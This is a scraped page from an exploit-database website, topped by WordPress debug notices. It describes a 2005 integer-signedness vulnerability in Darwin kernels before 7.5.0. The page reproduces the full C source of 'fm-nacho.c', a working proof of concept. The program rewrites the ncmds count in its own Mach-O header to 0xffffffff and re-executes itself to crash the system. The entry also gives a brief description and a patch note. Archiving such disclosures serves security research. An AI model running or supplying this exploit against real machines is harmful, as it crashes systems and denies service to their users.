Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-import-export-lite domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the insert-headers-and-footers domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121
Darwin Kernel Integer Overflow Vulnerability - exploit.company
header-logo
Suggest Exploit
vendor:
Darwin Kernel
by:
nemo@pulltheplug.org
7.2
CVSS
HIGH
Integer Overflow
190
CWE
Product Name: Darwin Kernel
Affected Version From: < 7.5.0
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Mac
2005

Darwin Kernel Integer Overflow Vulnerability

This vulnerability is due to a failure of the affected to properly handle integer signedness. An attacker may leverage this issue to cause the affected computer to crash, denying service to legitimate users. It has been speculated that this issue may also be leverage to escalate privileges, although this is unconfirmed.

Mitigation:

Update to the latest version of Darwin Kernel
Source

Exploit-DB raw data:

/*
source: https://www.securityfocus.com/bid/12314/info

Reportedly a local integer overflow vulnerability affects the Darwin Kernel. This issue is due to a failure of the affected to properly handle integer signedness.

An attacker may leverage this issue to cause the affected computer to crash, denying service to legitimate users. It has been speculated that this issue may also be leverage to escalate privileges, although this is unconfirmed. 
*/

//---------------------( fm-nacho.c )--------------------------
/*
 * DoS for Darwin Kernel Version < 7.5.0
 * -(nemo@pulltheplug.org)-
 * 2005
 *
 * greetz to awnex, cryp, nt, andrewg, arc, mercy, amnesia ;)
 * irc.pulltheplug.org (#social)
 */

#include <stdio.h>

int main(int ac, char **av)
{
        FILE *me;
        int rpl = 0xffffffff;
        fpos_t pos = 0x10;
        printf("-( nacho - 2004 DoS for OSX (darwin < 7.5.0 )-\n");
        printf("-( nemo@pulltheplug.org )-\n\n");
        printf("[+] Opening file for writing.\n");
        if(!(me = fopen(*av,"r+"))) {
                printf("[-] Error opening exe.\n");
                exit(1);
        }
        printf("[+] Seeking to ncmds.\n");
        if((fsetpos(me,&pos)) == -1) {
                printf("[-] Error seeking to ncmds.\n");
                exit(1);
        }
        printf("[+] Changing ncmds to 0x%x.\n",rpl);
        if(fwrite(&rpl,4,1,me) < 1) {
                printf("[-] Error writing to file.\n");
                exit(1);
        }
        fclose(me);
        printf("[+] Re-executing with modified mach-o header.\n");
        sleep(5);
        if(execv(*av,av) == -1 ) {
                printf("[-] Error executing %s, please run manually.\n",*av);
                exit(1);
        }
        exit(0); // hrm
}

Navigation

Suggest Exploit

Services By CQR

cqrsecured